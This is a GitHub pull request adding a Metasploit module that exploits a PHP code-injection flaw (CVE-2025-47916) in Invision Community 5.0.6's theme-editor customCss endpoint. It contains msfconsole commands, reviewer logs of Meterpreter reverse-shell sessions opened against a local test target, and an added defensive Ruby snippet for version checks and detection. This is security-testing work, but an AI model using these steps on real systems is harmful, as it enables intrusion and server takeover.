Add Invision Community 5.0.6 customCss RCE (CVE-2025-47916)#20214

Merged
jheysel-r7 merged 5 commits into rapid7:master from Chocapikk:invision_customcss_rce
May 21, 2025
Conversation

@Chocapikk
Contributor

Hello Metasploit team,

This pull request adds a new exploit module for Invision Community versions up to and including 5.0.6, which is vulnerable to a remote-code injection in the theme editor’s customCss endpoint (CVE-2025-47916). The module leverages the malformed {expression="…"} construct to evaluate arbitrary PHP expressions and supports both in-memory PHP payloads and direct system command execution.

Implements

  • exploit/multi/http/invision_customcss_rce.rb
  • check method that fetches /admin/install/eula.txt and parses the IPS version
  • Payload wrapper using phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
  • Support for PHP meterpreter in-memory payloads (ARCH_PHP) and system commands (ARCH_CMD)
  • Module metadata: authors, references (including CVE-2025-47916), disclosure date, notes

Verification

  • Start msfconsole
  • use exploit/multi/http/invision_customcss_rce
  • Check vulnerability: check
    • Expect "Detected IPS version: 5.0.6" and "is vulnerable"
  • Exploit with PHP meterpreter:
    use exploit/multi/http/invision_customcss_rce
    set TARGET 0
    set PAYLOAD php/meterpreter/reverse_tcp
    run http://localhost:7777
    • Verify a Meterpreter session opens and sysinfo returns host info
  • Exploit with command shell:
    set TARGET 1
    set payload cmd/linux/http/x64/meterpreter_reverse_tcp
    run http://localhost:7777
    • Verify a Meterpreter session opens and sysinfo returns host info
  • Document usage and background in documentation/modules/exploits/multi/http/invision_customcss_rce.md

Note: For testing purposes I have temporarily copy-and-pasted the php_exec_cmd helper into this module; it will be removed once PR #20160 is merged.

cc: @jvoisin
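As an added example (not the PR's module and not Invision Community code), the Ruby below sketches the two defender-side decisions the description implies: whether a host's Invision Community version falls in the affected range (up to and including 5.0.6), and how to spot the malformed {expression="…"} construct in captured requests to the theme editor's customCss endpoint. Only those two facts come from the PR; the endpoint path, the request tuple shape, the sample bodies and the version regex (the wording of /admin/install/eula.txt is not shown in the PR) are constructed assumptions.

```ruby
require 'cgi'

# Added example (not part of the PR's Metasploit module). Only two facts come
# from the PR: the affected range (Invision Community <= 5.0.6) and the
# malformed {expression="..."} construct. The endpoint path, request format and
# sample requests below are constructed assumptions for illustration.

AFFECTED_MAX = Gem::Version.new('5.0.6')

# True when an Invision Community version string falls in the affected range.
# Unparseable strings are reported as not affected rather than raising, so the
# caller can fall back to a manual check instead of crashing an inventory run.
def affected_version?(version)
  Gem::Version.new(version.to_s) <= AFFECTED_MAX
rescue ArgumentError
  false
end

# Pulls the first dotted three-part version out of free text (e.g. the text the
# module's check method reads from /admin/install/eula.txt). The exact wording
# of that file is not given in the PR, so this regex is an assumption.
VERSION_RE = /\b(\d+\.\d+\.\d+)\b/

def extract_version(text)
  m = VERSION_RE.match(text)
  m && m[1]
end

# Matches the malformed construct after URL-decoding: case-insensitive,
# tolerant of whitespace around '=' and of single or double quotes.
EXPRESSION_RE = /\{\s*expression\s*=\s*["']/i

def suspicious_customcss?(decoded_body)
  EXPRESSION_RE.match?(decoded_body)
end

# Constructed sample requests: [method, path, form body]. The path is an
# assumed shape for the theme editor's customCss endpoint, not a documented one.
SAMPLE_REQUESTS = [
  ['POST', '/admin/?app=core&module=customization&controller=themes&do=customCss',
   'customCss=body%7Bcolor%3Ared%3B%7D'],                  # benign CSS
  ['POST', '/admin/?app=core&module=customization&controller=themes&do=customCss',
   'customCss=%7Bexpression%3D%221%2B1%22%7D'],            # {expression="1+1"}
  ['GET',  '/admin/?app=core&module=customization&controller=themes&do=customCss', ''],
  ['POST', '/index.php?app=forums&module=forums&controller=topic', 'Content=%7Bexpression%7D'],
].freeze

# Returns the decoded bodies of POSTs to the customCss endpoint that carry the
# construct. These are what a detection rule would alert on; combine with
# affected_version? to prioritise hosts that are both targeted and unpatched.
def flag_customcss_requests(requests)
  requests.filter_map do |method, path, body|
    next unless method == 'POST' && path.include?('do=customCss')
    decoded = CGI.unescape(body)
    decoded if suspicious_customcss?(decoded)
  end
end

if $PROGRAM_NAME == __FILE__
  puts "5.0.6 affected? #{affected_version?('5.0.6')}"
  puts "5.0.7 affected? #{affected_version?('5.0.7')}"
  flag_customcss_requests(SAMPLE_REQUESTS).each { |b| puts "flagged: #{b}" }
end
```

The decode-then-match order matters: the construct arrives form-encoded, so a rule that searches the raw body for `{expression=` misses it. Matching on the admin endpoint rather than on every request keeps the rule from firing on ordinary forum posts that merely mention the word.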

@bcoles bcoles added the module label May 20, 2025
@jheysel-r7 jheysel-r7 self-assigned this May 20, 2025
Chocapikk and others added 2 commits May 20, 2025 21:28
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
@Chocapikk Chocapikk force-pushed the invision_customcss_rce branch from e9493c9 to 14501a6 May 20, 2025 21:00
Contributor

@jheysel-r7 jheysel-r7 left a comment

Thanks for the module @Chocapikk. Looks great, testing was as expected.

Testing

php/meterpreter/reverse_tcp

msf6 exploit(multi/http/invision_customcss_rce) > run rhost=127.0.0.1 rport=7777 lhost=172.16.199.1
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected IPS version: 5.0.6
[+] The target is vulnerable. IPS version 5.0.6 is vulnerable (≤ 5.0.6)
[*] Sending exploit to 127.0.0.1:7777 ...
[*] Sending stage (40004 bytes) to 172.16.199.1
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.1:58613) at 2025-05-20 19:01:56 -0700

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : d4a8dc0393fe
OS          : Linux d4a8dc0393fe 6.10.14-linuxkit #1 SMP PREEMPT_DYNAMIC Tue Apr 15 16:05:22 UTC 2025 x86_64
Meterpreter : php/linux

cmd/linux/http/x64/meterpreter_reverse_tcp

msf6 exploit(multi/http/invision_customcss_rce) > run rhost=127.0.0.1 rport=7777 lhost=172.16.199.1
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected IPS version: 5.0.6
[+] The target is vulnerable. IPS version 5.0.6 is vulnerable (≤ 5.0.6)
[*] Sending exploit to 127.0.0.1:7777 ...
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.1:58637) at 2025-05-20 19:04:08 -0700
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : 172.25.0.3
OS           : Debian 12.10 (Linux 6.10.14-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

@jheysel-r7 jheysel-r7 merged commit ca40f6e into rapid7:master May 21, 2025
18 checks passed
@jheysel-r7
Contributor

Release Notes

This adds a new exploit module for Invision Community versions up to and including 5.0.6, which is vulnerable to a remote-code injection in the theme editor’s customCss endpoint (CVE-2025-47916). The module leverages the malformed {expression="…"} construct to evaluate arbitrary PHP expressions and supports both in-memory PHP payloads and direct system command execution.

@jheysel-r7 jheysel-r7 added docs rn-modules release notes for new or majorly enhanced modules labels May 21, 2025
@jheysel-r7 jheysel-r7 moved this from Todo to Done in Metasploit Kanban May 21, 2025